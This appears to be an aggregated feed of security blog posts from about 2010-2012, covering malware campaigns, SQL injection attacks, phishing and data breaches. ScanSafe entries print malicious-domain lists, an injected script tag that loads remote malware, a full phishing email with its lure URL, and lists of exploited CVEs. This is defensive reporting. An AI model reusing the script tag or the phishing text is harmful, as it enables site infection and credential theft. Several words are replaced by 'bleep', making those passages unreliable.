http://www.veracode.com/blog/?feed=rss2 When I read the New York Time BITS article The Dangers of Allowing an Adversary Access to a Network by John Markoff, I thought the fear of trojaned vendor products is misplaced. The much bigger problem is vulnerable products. To cyber security experts, a serious vulnerability is indistinguishable from a backdoor as both allow an adversary to take control of a system or device. Yet the U.S. House Committee seems preoccupied with backdoors in Huawei technology while ignoring the gaping vulnerabilities.

==> Common Malware Types: Cybersecurity 101

http://www.veracode.com/blog/?feed=rss2 The amount and variety of malicious programs out there is enough to make your head spin. This blog post will break down the common types of malicious programs and provide a brief description of each. What is Malware? Malware is short for malicious software, meaning software that can be used to compromise computer functions, steal data, bypass access controls, or otherwise cause...

==> Bad Piggies, Graffiti and the IRT

http://www.veracode.com/blog/?feed=rss2 How bad is Googles application security problem? Think New York City in the 1970s. Just like New York during those dark days, Google faces a myriad of problems: many of its own making. And the Silicon Valley star might consider looking to Gotham for inspiration as it tries to turn things around.

==> Why You Should Care About Mobile Security Infographic

http://www.veracode.com/blog/?feed=rss2

==> How Secure is Your Software Security From Hackers?

http://www.veracode.com/blog/?feed=rss2 Companies spend millions on sophisticated anti-intrusion systems, that lock down their corporate assets against any kind of network attack. Then they sit back and relax, confident that not even the smartest, trickiest, most downright determined hacker would ever be able to break in. And that hacker would have to be a total genius right?

==> Bulking Up For BYOD: Veracode Acquires Marvin Mobile Security

http://www.veracode.com/blog/?feed=rss2 It's an exciting day here at Veracode as we've just announced our first ever company acquisition. We're pleased to announce that we have acquired the assets of Marvin Mobile Security, the developer of an innovative mobile app analysis service for enterprises, app stores and mobile carriers. Read more about this in our official press release.

==> Enterprise App Stores: Walled Gardens, or a Security Mirage?

http://www.veracode.com/blog/?feed=rss2 Enterprise app stores are all the rage, but do they solve the BYOD security conundrum? The short answer: no. The trend that Forrester Research famously dubbed the consumerization of IT is, just a short time later, accepted practice in the modern workplace. We see it every day, as workers migrate off of older generation cell phones to powerful smart phones like the iPhone and Android devices and companies abandon the enterprise friendly Blackberry platform en masse.

==> Spate of SpyEye Trojan Email

http://blog.scansafe.com/journal/rss.xml Beginning on May 5th, ScanSafe has observed numerous instances of a variant of the SpyEye family of trojans being delivered via email. The overwhelming majority of these are delivered via corp mail; very little have been observed via free webmail services. The rate of encounter suggests the mail may be getting through corp spam filtering at the affected locations. The body of the email contains a link that downloads a zip file containing the malware. The malware appears to be hosted on compromised websites in the following folder location: compromiseddomain\order\Order.zip The zip itself extracts into an executable. However, a double extension ruse combined with multiple spaces makes it appear as if the file is actually a .doc file. (The spaces push the .exe extension off the screen). Obviously this could trick many users into attempting to open the “doc” in which case they will actually infect their PC with the SpyEye trojan. ScanSafe detects and blocks this malware as: Mal/BredoZp-B Mal/EncPk-YJ Trojan.Win32.Menti.gjgn Trojan-Spy.Win32.SpyEyes.hdy First observed encounter was 05-may-11 at 11:38:05GMT.

==> Lizamoon SQL Injection: 7 Months Old and Counting

http://blog.scansafe.com/journal/rss.xml The Lizamoon SQL injection attack is not new; its actually part of a continuous SQLi attack that spans the past seven months. Lizamoon.com is just one of the more recent of the 40+ malware domains that have been used in the ongoing injection attacks. Here are some quick facts regarding the SQLi / Lizamoon compromises: * A total of 42 malware domains have been observed during the 7 months this attack has been ongoing; * The first encounter Cisco ScanSafe recorded was 20-sep-10 21:58:08 GMT; * Only 0.15% (zero point one five percent) have involved encounters with functional / active malware domains; * 99.85% of encounters have involved malware domains that were non-resolvable (shutdown / offline) at the time of encounter; * 55% of the encounters occurred on March 25th when the Lizamoon domain was added; * The high rate of encounters on the 25th was solely due to a single high profile website that was compromised; * Of the Lizamoon encounters on March 25th, only 0.13% were encounters with the live domain. 99.87% were non-resolvable (i.e. the domain was offline / not delivering content). Here's the current list of domains we've observed in these attacks, from September 2010 through March 31, 2011: agasi-story.info alexblane.com alisa-carter.com ave-stats.info books-loader.info eva-marine.info extra-911.info extra-service.info general-st.info google-stat50.info google-stats44.info google-stats45.info google-stats47.info google-stats48.info google-stats49.info google-stats50.info google-stats54.info google-stats55.info google-stats73.info lizamoon.com milapop.com mol-stats.info multi-stats.info online-guest.info online-stats201.info people-on.info pop-stats.info security-stats.info social-stats.info sol-stats.info star-stats.info stats-master11.info stats-master111.info stats-master88.info stats-master99.info system-stats.info t6ryt56.info tadygus.com tzv-stats.info urllizamoon--com.rtrk.co.uk world-stats598.info

==> Royal Engagement May Lead to Royal Malware Pains

http://blog.scansafe.com/journal/rss.xml The Telegraph reports "Royal memorabilia industry prepares to cash in" - The battle to cash in on Prince William’s impending marriage to Kate Middleton has already begun, with an array of royal memorabilia set to flood the market. My first thought on reading this was that malware and scammers will be even quicker to cash in. Indeed, many are proclaiming that Prince William's and Kate Middleton's wedding (set for sometime next spring) will be the biggest marital event since Princess Di and Prince Charles. With that in mind, it's important to remember three important thingst: 1. Major breaking news events are favorite themes for malware purveyors and scammers; 2. Clicking unsolicited links in email and IM are a frequent path of infection; 3. Criminals work fast - expect your favorite search engine to already be sprinkled liberally with malicious results regarding the engagement and upcoming nuptials. Cisco ScanSafe research indicates that 3 out of every 100 malware encounters results from people clicking unsolicited malicious links in email, IM and social messaging, and 10 out of evey 100 encounters occur via search engine results. Bottom line - think before you click, consider the source, and pay attention to the destination URL. By following this advice, hopefully you can toast to the happy couple without toasting your computer.

==> Phish with a Side of Barbecue

http://blog.scansafe.com/journal/rss.xml Looks like the latest Bank of America phishing scam is springboarding off a couple of compromised websites. First, here's a look at the predictably worded phishing email: Dear Bank of America Customer, We recently have determined that different computers have logged in your Bank of America Online Banking account, and multiple password failures were present before the logons. We now need you to re-confirm your account information to us. If this is not completed by July 31st, 2010, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner. In order to confirm your Online Bank records, we may require some specific information from you. To restore your account, please Sign in to Online Banking. Here's where victims get sauced. The link behind "Sign in to Online Banking" actually points to gramsbbq.org/bain. Now grambbq.org is the legitimate website for Gram's Mission Barbecue Palace in Riverside, CA. The gramsbbq.org/bain page is a 302 redirect that leads to a phishing page hosted on a second compromised site: chasingarcadia.com (the website for Canadian band Chasing Arcadia). The actual phishing page is at: http://www.chasingarcadia.com/channel/safe.sslbankofamerica.com/index.htm This use of compromised sites as redirectors and phishing host enables the attackers to bypass reputation filters and/or community-based trust reporting. And it increases the collateral damage, because if/when the compromised sites are blacklisted, those businesses could suffer as a result.

==> WSJ a Victim, Not the Source, of SQL Injection

http://blog.scansafe.com/journal/rss.xml As mentioned earlier this week, about 7k pages (not sites) have been struck by SQL injected iframes pointing to malware on robint.us. (That number has been over-inflated by over 100k or even a million due to poorly constructed search queries, which was the subject of the previous post on the topic). Anyway, in some of the reports, one of the sites claimed to be compromised was that of the Wall Street Journal (WSJ.com). However, ScanSafe investigation reveals the SQL injection attack that appeared on certain pages of the WSJ site weren't the result of compromise on WSJ directly, but rather the result of compromise of a third-party partner. That partner, adicio.com, provides real estate listings that are in turn displayed on certain pages of the WSJ.com website. Of course, from a site visitor's perspective, this might seem a bit semantic. But still, it is worth pointing out that it wasn't really wsj.com that was compromised.

==> Robint.us a Poster bleep for Repeat Injections

http://blog.scansafe.com/journal/rss.xml One of many SQL injection attacks is getting some blogger attention, largely due to generic searches on the malware domain name. The malicious iframe on the compromised site is: script src=http://ww.robint.us/u.js Search on the full iframe with quotes and you get about 7k hits in Google. But search on just the domain name or omit the quotes and you get over a million hits. That's because the more generic search picks up any page that mentions the domain or includes any mix of those keywords. This loosely constructed search mistake causes some to believe the attack is much larger than it really is. Certainly 7k Web pages compromised is nothing to sneeze at but it's certainly not a million pages and certainly nothing new - many of these same compromised pages have been repeatedly compromised in one SQL injection attack after another since 2007. On a more positive note, when SQL injection attacks first went mainstream a few years back, it wasn't uncommon to see a million+ pages compromised in a single attack. From that perspective, 7k is a vast improvement and shows that at least many sites are paying attention and taking the appropriate security measures. On the downside, attacks like robint.us are just one of over a thousand unique attacks carried out via the Web each month.

==> GoDaddy Attacks Top Web Malware in May

http://blog.scansafe.com/journal/rss.xml Some interesting stats from May. * 16196 unique malicious domains. * The top ten malicious domains comprised 23% of all Web malware attacks in May 2010. * Five of the top ten were related to attacks against GoDaddy-hosted websites, for a total of 14% of all Web malware in May 2010. * Top Web malware was Trojan.JS.Redirector.cq, the majority of which resulted from attacks against GoDaddy-hosted websites. * Gumblar was the second most prevalent Web malware encountered, at 7%. * Third most prevalent Web-distributed malware encountered was Backdoor.Win32.Alureon, at 6%. Top Ten Malicious Domains, May 2010 holasionweb.com* - 7% www.sitepalace.com - 3% losotrana.com* - 2% indesignstudioinfo.com* - 2% kdjkfjskdfjlskdjf.com* - 2% easfindnex.org - 2% findermar.org - 2% 76.73.33.109 - 2% findrasup.org - 1% zettapetta.com* - 1% *Related to attacks against GoDaddy-hosted websites Top Ten Web Malware, May 2010 Trojan.JS.Redirector.cq - 14% Exploit.JS.Gumblar - 7% Backdoor.Win32.Alureon - 6% Exploit.Java.CVE-2009-3867.d - 3% Trojan.JS.Redirector.at - 3% Downloader.JS.Agent.fhx - 2% OI.Backdoor.Win32.Autorun.cx - 2% OI.Win32.Susp.ms - 2% Trojan.Iframe.f - 2% Trojan.GIFIframe.a - 2%

==> WordPress Hacks: Not Just NetSol and GoDaddy

http://blog.scansafe.com/journal/rss.xml Over the past month or so, there have been a series of ongoing compromises which have been interchangeably blamed on WordPress, Network Solutions, or GoDaddy. However, the attacks are occurring on many other hosts as well, including: 1 & 1 DreamHost In2Net Hostway Media Temple ServerBeach and several others. While many of the compromised sites are using WordPress, some are not. The two main attacks are: (1) the Google / WordPress pharma attacks and (2) the Grepad.com family of attacks that netted Network Solutions hosted sites, some U.S. Treasury sites, and many, many popular niche 'mom and pop' style sites. Google / WordPress Pharma Hacks In the Google / WordPress pharma attack, the attackers are targeting popular Web pages and modifying the title tag of those pages to include a pharmaceutical sales pitch. Searches that would normally cause the legitimate site to appear in search engine results pages (SERPs) will also include the manipulated title tag. The link itself still points to the legitimate site, but modifications on the compromised site will cause an automatic redirect to the pharmaceutical site. Note that many of the sites that appear in Google SERPs for these title tags are not necessarily compromised. Quite often, blog and forum comments will adopt the title tag of the post and spammers are using these same tags. For those that are compromised, currently the redirect points to "thepharmacydiscount.com/group/bestsellers.html?said=compromised.com" where compromised.com equals the name of the legitimate (but compromised site) that is delivering the redirect. The point behind the Google / WordPress pharma attacks is to leverage the popularity ranking of the compromised sites, which boosts the SERPs ranking for the pharma keywords used. Grepad.com Attacks The intent of the Grepad.com family of attacks is not to gain favorable placement in SERPs to peddle counterfeit bleep, but rather to download malware to the site visitors' PCs. Pages on the compromised websites are embedded with hidden iframes that load content from the malware domain. Multiple malware domains have been used in these attacks, including grepad.com, ginopost.com, bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com and networkads.net. Exploits of multiple vulnerabilities are attemped in order to download this malware. A list of observed exploits can be found in this blog post. Commonalities Between Attacks In both sets of attacks, the attackers are filtering based on whether the clickthrough to the site is human or a search spider. In the pharma attacks, the malformed title is only presented to search spiders and the redirect only occurs if you click the link from SERPs. If you visit the site directly, by typing in the URL or from a non-SERPs link on another site, the legitimate page will load normally. The exact opposite is true with the Grepad.com family of attacks. In these cases, the filters suppress the compromise so that search spiders don't see the embedded iframe. If the link is accessed directly (or via a link from a non-search engine), then the iframe will be rendered. However, the attackers also drop a cookie when visitors hit a compromised page and suppress the iframe on subsequent visits. Filtering is also being done by IP address ranges, operating system, and user_agent to determine when the embedded iframe (or pharma redirect) will occur. The Million Dollar Question: How? The why is easy to answer: attackers want to make money. The how is a bit more cloudy. It appears the attacker is able to read wp-config.php which by necessity contains plaintext credentials for the WordPress database. Normally, wp-config.php should not be externally readable, unless the user has not properly configured file permissions. In any event, once initial access was gained, the attackers inserted or modified entries in the wp-option table for the active WordPress database. In subsequent phases (in the case of the Grepad family), the attackers modified php.ini / .htaccess, uploading malicious scripts which then embed the iframe. At this point, the attackers have the ability to plant PHP backdoors on the compromised sites, a precedent first set by Gumblar. The presence of the backdoor would allow continued access to the compromised sites, even after file permissions were properly configured or FTP credentials had been changed. And if proper segregation is not done, bleed over to other sites on the same hosted share can still occur. It's worth noting that the U.S. Bureau of Engraving and Printing (bep.gov and moneyfactory.gov) were compromised in the most recent wave of the Grepad.com attacks. While neither of these sites appear to have been using WordPress, both were hosted by Network Solutions and appear to have been published with Network Solutions Website Builder.

==> Grepad.com Iframe Nets Gov't, Niche Sites

http://blog.scansafe.com/journal/rss.xml ScanSafe traffic analysis reveals a number of government and popular niche websites have been embedded with a malicious script inserted after the closing html tag. The script first drops a cookie to identify repeat visitors, then loads an iframe pointing to grepad.com. In turn, grepad.com redirects to ginopost.com which attempts to exploit a series of vulnerabilities. Observed exploits include: * Adobe Reader and Acrobat util.printf stack-based buffer overflow (CVE-2008-2992) * Adobe Reader and Acrobat getIcon stack-based buffer overflow (CVE-2009-0927) * Office OCX OpenWebFile (BID-33243) * Symantec AppStream LaunchObj ActiveX control (CVE-2008-4388) * Hummingbird PerformUpdateAsync (CVE-2008-4728) * Peachtree ExecutePreferredApplication (CVE-2008-4699) * C6 Messenger propDownloadUrl (CVE-2008-2551) * Internet Explorer memory corruption (MS09-002) The malware host, ginopost.com, was registered on April 25th, using the same IP address (188.124.16.104) as a series of malware hosts that have been engaged in attacks on Network Solutions hosted WordPress blogs. Previous malware domains using that IP have included bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com and networkads.net. Attacks on WordPress-published websites have not been restricted to those hosted by Network Solutions. A separate ongoing series of attacks have also been targeted against WordPress-published sites hosted by GoDaddy.

==> New record in ridiculous password rules

http://blogs.securiteam.com/index.php/feed/ The US Treasury wants to show how much they care about security. To show how much, here are their password guidelines: Must be at least 8 characters long. Must contain at least one uppercase letter. Must contain at least one lowercase letter. Must contain at least one numeric character. Must contain at least one special [...]

==> More bad news for risk management

http://blogs.securiteam.com/index.php/feed/ Overconfidence makes you successful in business. Not just confidence, mind you, overconfidence. Add in the Dunning-Kruger effect, and the Peter Principle, and you start to realize why all those huge banks keep failing …

==> REVIEW: “Learning from the Octopus”, Rafe Sagarin

http://blogs.securiteam.com/index.php/feed/ BKLNFOCT.RVW 20120714 “Learning from the Octopus”, Rafe Sagarin, 2012, 978-0-465-02183-3, U$26.99/C$30.00 %A Rafe Sagarin %C 387 Park Ave. South, New York, NY 10016-8810 %D 2012 %G 978-0-465-02183-3 0-465-02183-2 %I Basic Books/Perseus Books Group %O U$26.99/C$30.00 800-810-4145 www.basicbooks.com %O http://www.amazon.com/exec/obidos/ASIN/0465021832/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/0465021832/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/0465021832/robsladesin03-20 %O Audience n+ Tech 1 Writing 2 (see revfaq.htm for explanation) %P 284 [...]

==> Bridge tolling account and spam

http://blogs.securiteam.com/index.php/feed/ Recently one of the bridges in my area was replaced by a new one. The new Port Mann Bridge is, at the moment, apparently the widest in the world, and will relieve congestion on the existing bridge, which has been a huge bottleneck for years. (Why do I keep flashing on an old saying about [...]

==> Security Transcends Slogans … or not …

http://blogs.securiteam.com/index.php/feed/ I have just got off the phone with a marketroid. In the course of our conversation (no, I usually don’t talk to them, but this turned our to be a special case), I was explaining to her about ISC2 and the CISSP. She was puzzled by an annotation on my file with her company, and [...]

==> Lockitron

http://blogs.securiteam.com/index.php/feed/ Keyless Entry Using Your Phone. 1) I keep telling people, the next security risk is the next technology that is there solely for “convenience.” 2) So, your credit cards are going to be in your cell, your bank access is going to be in your cell, your car keys are going to be in your [...]

==> bleep abandonment

http://blogs.securiteam.com/index.php/feed/ There are always two sides (and maybe more) to every story, but: Police called to a scene where bleep were reportedly abandoned. Police arrive to find bleep on a suburban street, and the mother watching from the porch. So the police take the mother to jail.

==> Biblical epics return!

http://blogs.securiteam.com/index.php/feed/ (Sorry, nothing to do with security in this one.) Hollywood has rediscovered the Bible as movie source material. (Probably because it’s in the public domain, and saves costs.) In production is “Noah,” which stars Russell Crowe as someone mumbling about God telling him to build a boat, and then beating up his neighbours when they [...]

==> Not the bad news you thought you were reporting …

http://blogs.securiteam.com/index.php/feed/ “The 2012 Norton Cybercrime Report, released Wednesday, says more than 46 per cent of Canadians have reported attempts by hackers to try to obtain personal data over the past 12 months,” according to the Vancouver Sun. Well, since I see phishing every single day, and malware a few times times per week, what this survey [...]

==> Hiring droids – “Would like like coffee breaks with that?”

http://blogs.securiteam.com/index.php/feed/ What is true of teachers is also true for recruiters. I am old enough to have gone through group interviews, hostile interviews, video interviews, multi-part phone interviews, questionnaire interviews, weird question interviews, “waht do you want to be when you grow up” interviews, and all the other “latest and greatest” ideas that swept through HR-land [...]

==> Teacherless classrooms?

http://blogs.securiteam.com/index.php/feed/ Someone has made yet another prediction that teachers will shortly be replaced by technology. Teacherless classrooms are, apparently, the way of the future. I recall this prediction being made, to great fanfare, thirty years ago. I was, at the time, a public school teacher, and at a conference on science education. The first speaker of [...]

==> Canada’s Fastest Network! (Yeah, right.)

http://blogs.securiteam.com/index.php/feed/ I’ve mentioned before that I use Shaw as my ISP at home. Right at the moment, they have an advertising campaign that claims they are, or have, Canada’s fastest network. Now, I’m willing to believe that Shaw is not being deliberately mendacious or misleading. There is probably someplace, or some part of Shaw’s network, that [...]

==> Securing the Software Development Environment

http://blogs.securiteam.com/index.php/feed/ In the February 2012 edition of Computer, a sidebar to an article on “Web Application Vulnerabilities” asks the question: “Why don’t developers use secure coding practices?” [1] The sidebar provides the typical cliches that programmers feel constrained by security practices and suggests that additional education will correct the situation. Another magical solution addressing security concerns [...]

==> The Evolution of a Technical Information Professional

http://blogs.securiteam.com/index.php/feed/ During my years of work as a consultant and trainer in the information security world, I’ve noticed a few patterns that usually exist in those who do very well in the industry vs those who just make it by. I decided to draft this article to share some of the key elements and more importantly, [...]

==> REVIEW: “Managing the Human Factor in Information Security”, David Lacey

http://blogs.securiteam.com/index.php/feed/ BKMHFIIS.RVW 20120216 “Managing the Human Factor in Information Security”, David Lacey, 2009, 978-0-470-72199-5, U$50.00/C$55.00/UK#29.99 %A David Lacey %C 5353 Dundas Street West, 4th Floor, Etobicoke, ON M9B 6H8 %D 2009 %G 978-0-470-72199-5 0-470-72199-5 %I John Wiley & Sons, Inc. %O U$50.00/C$55.00/UK#29.99 416-236-4433 fax: 416-236-4448 %O http://www.amazon.com/exec/obidos/ASIN/0470721995/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/0470721995/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/0470721995/robsladesin03-20 %O Audience n- Tech 1 Writing [...]

==> SMS Apple (malware) spam on Bell Mobility (Canada)

http://blogs.securiteam.com/index.php/feed/ SMS spam on Bell seems to have suddenly jumped. On Tuesday, both Gloria and I got spam saying we had won something from Apple. Today, we both got similar spam. Today’s message came “from” 240-393-8527. It asked us to visit hxxp://www.apple.com.ca.llhf.net [1] Neither F-Secure nor VirusTotal had anything to say about it, but it is [...]

==> M-ETH: Man in the middle – Ethernet

http://blog.wintercore.com/?feed=rss2 Over a year ago I presented at LaCon'09 a custom PCI NIC which allows to perform Man in the middle of the whole network traffic flowing through the device. The idea behind this PCI Card is onceit isplugged into a computer the whole traffic can be inspected, analyzed and, of course, modified when required in [...]

==> Vulnerability Engineering

http://blog.wintercore.com/?feed=rss2 In this article we are going to use some metrics from Software Engineering and apply them to the Vulnerability Research World. We are going to define a new term which will allow us get a probabilty showing how likely is an application to have a vulnerability during its lifetime and also will give an idea [...]

==> See Artica Demo Client and IceSphere in action

http://blog.wintercore.com/?feed=rss2 Download Video (24 mb) Do not hesitate to contact us if you need further information

==> Motorola Timbuktu’s Internet Locator Service real-time data exposed to public

http://blog.wintercore.com/?feed=rss2 We just want to make a public warning to those users of Motorola/Netopia Timbuktu Remote Control Software who are using the Internet Locator service. This service allows to locate any Timbuktu's user just by knowing the email. More than five months ago we notified Netopia's customer support (http://blog.wintercore.com/2008/04/26/things-that-shouldnt-be-there/), after discovering a hardcoded user/password pair within [...]

==> Toward a new generation of audio captchas

http://blog.wintercore.com/?feed=rss2 It seems the post "Breaking Gmail's audio Captcha" has been slashdotted so many interesting discussions have emerged as a result. It's worth noting that there is nothing specially exciting in the approach used to break the google audio captcha, merely a bunch of signal analysis and pattern recognition principles applied. Almost any Voice Recognition / [...]

==> Things that shouldn’t be there

http://blog.wintercore.com/?feed=rss2 Some days ago we released a security advisory for Realtek-curious note: according to secunia, it is the first advisory for that vendor- where a piece of code that was originally intented to be used by the engineers only, ends up being compiled in the release driver. Obviously, there is no reason to think about this [...]

==> Breaking Gmail’s Audio Captcha

http://blog.wintercore.com/?feed=rss2 A week ago I came across this interesting post at the Websense blog, anyway I guess everybody is already aware that a bot was spotted breaking Gmail's image captcha. According to the post, the success rate is about 20%, which from spammers point of view is really profitable and sure more than enough for its [...]

==> UK Is Sixth In The World As Cyber Crime Target, Cyber Security Is Not Marketed Enough

http://cyberinsecure.com/feed/ It has been suggested by UK ministers recently that there should be better awareness of theimportance of cyber security. Although conventionally, it is the more traditional generations that are wary of sharing their details in the new digital world, it is perhaps not such a bad thing to be more cautious. Jim Murphy, the Shadow [...]

==> Hijacked High-Ranked Sites Serve Malicious, Illegal Content, Blacklisted By Google

http://cyberinsecure.com/feed/ Researchers have found that Google Safe Browsing has blacklisted a number of legitimate sites after they’ve been hijacked and set up to serve malicious or illegal content. Many of them are ranked high, according to Alexa. Zscaler experts have scanned the first 1 million websites found in the Alexa top and found that 621 of [...]

==> Apple Plugs Java Hole After Flashback Trojan Creates 550,000 Strong Mac Botnet

http://cyberinsecure.com/feed/ Apple released a security update for OS X Java on Tuesday, plugging a security vulnerability exploited by the latest Flashback Trojan. The latest variant of the Mac-specific malware appeared on Monday and targeted a vulnerability in Java (CVE-2012-0507) which was patched on Windows machines more than six weeks ago. Apple’s new version of Java for [...]

==> Free Malware Scanning Service SiteInspector Launched By Comodo

http://cyberinsecure.com/feed/ Security solutions provider Comodo released a free service called SiteInspector, designed to scan websites for pieces of malware and compare them against a range of blacklisting services, such as the ones offered by Google Safe Browsing, PhishTank or Malwaredomainlist. Drive-by-download malware attacks launched from websites that fall victim to mass infections are highly common these [...]

==> US Army CECOM Website Breached, 30 Record Sets With User IDs, Clear-text Passwords, Private Data Posted On Pastebin

http://cyberinsecure.com/feed/ Black Jester, the hacker who yesterday demonstrated that he managed to gain unauthorized access to a NASA site, leaked sensitive contract information from a site connected to the US Army Communications and Electronics Command (CECOM). A number of 30 record sets that include names, user IDs, physical addresses, email addresses, telephone numbers, and clear-text passwords [...]

==> Scareware Makes Files And Folders Invisible, Demands Ransom For Repair Utility

http://cyberinsecure.com/feed/ Bitdefender experts came across a piece of scareware that makes victims believe that something may have happened to all the files and folders stored on their computers. The user is then requested to pay $80 (60 EUR) for a tool that allegedly addresses the problem. Scareware or ransomware is not uncommon, many security solutions providers [...]

==> US Security Firm Stratfor Hit By ‘Anonymous’, Clients Credit Cards And Passwords Stolen

http://cyberinsecure.com/feed/ The hacking group “Anonymous” on Sunday Christmas claimed it has stolen thousands of credit card numbers and personal information of clients of the U.S. based security think-tank Stratfor and pilfered funds it gave away as Christmas donations to charity. Anonymous said it stole information from organizations and individuals that were clients of Stratfor, including Apple [...]

==> Ultimate Bet Players Accounts Compromised, 3.5 Million Records Freely Available Online For Weeks Still In Google Cache

http://cyberinsecure.com/feed/ In a breach of security at Ultimate Bet, information from every players account had been publicly posted on the internet, revealing personal information of approximately 3.5 million poker players holding accounts at the nearly-dead poker site. A popular poker forum website posted a link to the account information via an anonymous posting, but removed the [...]

==> Restaurant Depot, Jetro Cash & Carry Processing System Compromised, Credit Cards Sold On Russian Blackmarket

http://cyberinsecure.com/feed/ If you used a credit card between the dates of Sept. 21 and Nov. 18th at national restaurant wholesalers Restaurant Depot or Jetro Cash & Carry, then you should probably know that Russian cyberthugs wearing leather blazers and gold chains and stinking of Armani Aqua di Gio are currently selling your information on the black [...]

==> InternationalCheckout.com Database Hacked, Customers Credit Cards Abused

http://cyberinsecure.com/feed/ International Checkout customers began receiving emails that alert them on the fact that the organization has recently fallen victim to a cyberattack which resulted in the theft of a large quantity of personal information, including credit card details. International Checkout was recently the victim of a system intruder who was able to access encrypted credit [...]

==> Software Offered By CNET Bundled With Trojans, Spread Through Download.com

http://cyberinsecure.com/feed/ One of the developers of a network exploration and security auditing tool called Nmap is accusing CNET of bundling free software with Trojans and shady toolbars, and serving them on their Download.com website. Gordon Lyon, also known as Fyodor claims he discovered that Nmap and other free applications such as VLC are downloaded with pieces [...]

==> Unpatched Yahoo! Messenger Flaw Allows Status Updates Remote Hijacking

http://cyberinsecure.com/feed/ Security researchers have discovered an unpatched flaw in Yahoo! Messenger that allows miscreants to change any user’s status message. Hijacked status updates are a handy way to persuade a victim’s contacts to click on a link and lead them to a dangerous website. Worse still, the bug in version 11.x of the Messenger client requires [...]

==> Adidas Websites Taken Down After Attack, Adidas.com, Reebok.com Affected

http://cyberinsecure.com/feed/ The popular sports equipment maker took down some of its websites after a security breach that targeted their network was discovered on November 3. The affected locations include adidas.com, reebok.com, miCoach.com, adidas-group.com and some local e-commerce shops. They were all taken down in order to protect the individuals that might visit them. Our preliminary investigation [...]

==> Private Canadian bleep’s Ministry Papers Dumped In Trash, Contain Names, Addresses, Birth Dates

http://cyberinsecure.com/feed/ The B.C. government is dealing with another privacy breach after confidential documents from the Ministry of bleep and Family Development were found dumped in a garbage bin. The documents were discovered dumped in a green dumpster behind a Victoria apartment building last week, and contain client names, addresses, birth dates and health card numbers. At [...]

==> Numerous Defense And Chemical Firms Targeted In Industrial Espionage Campaign

http://cyberinsecure.com/feed/ Dozens of companies in the defense and chemical industries have been targeted in an industrial espionage campaign that steals confidential data from computers infected with malware, researchers from Symantec said. At least 29 companies involved in the research, development, and manufacture of chemicals and an additional 19 firms in defense and other industries have been [...]

==> Phishing Campaign Fake Legitimate Apple Emails, Steals Victims ID And Password

http://cyberinsecure.com/feed/ A phishing campaign which involves the reputation of Apple has been seen invading inboxes. The rogue message perfectly replicates alerts received by customers when the company notifies them on changes of their accounts. A Trend Micro researcher came across a message that looked very much like the genuine message he had received not long ago [...]

==> osCommerce Compromised Sites Distribute ZeuS Spin-off Trojan, Millions Of Pages Infected

http://cyberinsecure.com/feed/ Security researchers warn that variants of a ZeuS spin-off trojan called Ice-IX are being distributed from osCommerce websites compromised during a recent mass injection attack. The attack targeting osCommerce installations vulnerable to a flaw that dates from November 2010 began at the end of July. The code injection campaign escalated quickly and the number of [...]

==> Data From 56 Law Enforcement Agencies Stolen By Antisec, 10GBs Of Emails From 300 Accounts Posted Online

http://cyberinsecure.com/feed/ Hackers associated with Anonymous’ Operation Antisec have leaked a massive cache of personal records, email messages and confidential documents belonging to law enforcement agencies. The data was obtained recently when the group hacked into a server housing 77 websites belonging to county sheriff offices and other local law enforcement organizations. The leak has been posted [...]

==> US Government Contractor ManTech Hacked, Confidential Documents Stolen And Posted Online

http://cyberinsecure.com/feed/ Anonymous has published around 400 MB of confidential documents involving ManTech, a large federal contractor which provides IT solutions to many government departments. The hacktivist collective announced plans to release the files yesterday and even posted some teaser samples to prove it means business. The full archive was eventually released in true Anonymous style, with [...]

==> U.S. Military Contractor Booz Allen Hamilton Hacked, Emails And Sensitive Data Exposed

http://cyberinsecure.com/feed/ Hackers affiliated with the Anonymous collective and its Antisec campaign have hacked into computer systems belonging to U.S. military contractor Booz Allen Hamilton and leaked sensitive data found inside. The hackers described the attack in the description of a torrent posted on ThePirateBay which also contains a list of 90,000 email addresses belonging to military [...]

==> About the ITRC

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml IMG_4727_Scroller_Web2.jpg

==> Public Wifi Survey Whitepaper Released

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Identity Theft and Public WiFi Linked in Consumer Minds The Identity Theft Resource Center (ITRC), a nationally recognized non-profit focusing on identity theft and related issues, has just published a whitepaper containing the results of its Public WiFi Usage Survey, which aimed to measure the level of knowledge and usage of public WiFi. Click here for more information.

==> FBI Fraud Alert

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Banks Warned of Cyber Threat by FBI The Federal Bureau of Investigation, the Financial Services Information Sharing and Analysis Center, and the Internet Crime Complaint Center have jointly issued a Fraud Alert to financial institutions warning them of alarming trends in unauthorized wire transfers overseas in amounts ranging from $400,000 to $900,000. The Fraud Alert explains ... read more

==> It's a Boom Time for Mortgage Fraud

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml BankInfoSecurity.JPG New Schemes, Reporting Requirements Add to Surge Mortgage fraud investigations are in the spotlight. What's behind the surge, and what must financial institutions do to improve how they detect, prevent and report these costly schemes? Click here for more

==> Protect Your Identity Week 2012

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml PYIW_coalition_2012_190px_edited-1.jpg Click here - ID Theft Protection on the Go

==> FraudAvengers.org Newsletter

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml FraudAvengers.org has released their September newsletter! fraud_avengers.jpg The theme of the newsletter is Mobile Phone Security. Click on the image to read the newsletter

==> Breaches: Knowing Less and Less

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The ITRC recorded 213 breaches for the first six months of 2012, with an astonishing 63.4% of them having no reported attributes. This represents a doubling in the number of data breaches which did not have any type of attributes identified for the incident, giving the public little or no insight into what happened. This trend makes it obvious that with few exceptions, there is minimal transparency when it comes to reporting breaches. Click here for more

==> AZ Identity Theft Coalition

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Identity theft is problematic across the nation, being ranked fourth in the country for reports of identity theft means that Arizona is no stranger to this crime. The Office of the Arizona Attorney General has been instrumental in combating this crime through the creation and collaboration of various organizations and state agencies.

